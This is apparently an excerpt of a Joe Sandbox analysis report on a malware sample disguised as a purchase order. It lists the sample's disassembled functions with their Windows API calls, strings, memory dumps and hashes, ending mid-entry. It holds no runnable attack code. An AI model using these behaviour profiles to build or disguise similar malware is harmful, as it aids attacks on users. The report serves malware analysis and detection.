                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                  • String ID: %s%u
                                  • API String ID: 1899580136-679674701
                                  • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                  • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                  • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                  • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                  Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • 7427A570.USER32(00000000,?,?), ref: 0043143E
                                  • 74284C00.GDI32(00000000,?,?), ref: 0043144F
                                  • 74284C40.GDI32(00000000), ref: 00431459
                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74284$7427A570BitsObjectSelectStretch
                                  • String ID: (
                                  • API String ID: 2829590553-3887548279
                                  • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                  • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                  Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                  • API String ID: 1976180769-4113822522
                                  • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                  • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                  • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                  • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                  Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                  • String ID:
                                  • API String ID: 461458858-0
                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                  Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                  • DeleteObject.GDI32(?), ref: 004301D0
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3969911579-0
                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                  Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$DestroyItemObject$74285CountCursorDrawInfo
                                  • String ID: 0
                                  • API String ID: 125510622-4108050209
                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                  Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 1965227024-3771769585
                                  • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                  • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                  Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: SendString$_memmove_wcslen
                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                  • API String ID: 369157077-1007645807
                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                  Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32 ref: 00445BF8
                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                  • __wcsicoll.LIBCMT ref: 00445C33
                                  • __wcsicoll.LIBCMT ref: 00445C4F
                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 3125838495-3381328864
                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                  Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                  Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                  • _wcscpy.LIBCMT ref: 004787E5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                  • API String ID: 3052893215-2127371420
                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                  Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                  • __swprintf.LIBCMT ref: 0045E7F7
                                  • _wprintf.LIBCMT ref: 0045E8B3
                                  • _wprintf.LIBCMT ref: 0045E8D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-2354261254
                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                  Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 3038501623-2263619337
                                  • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                  • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                  Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                  • __swprintf.LIBCMT ref: 0045E5F6
                                  • _wprintf.LIBCMT ref: 0045E6A3
                                  • _wprintf.LIBCMT ref: 0045E6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-8599901
                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                  Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • timeGetTime.WINMM ref: 00443B67
                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
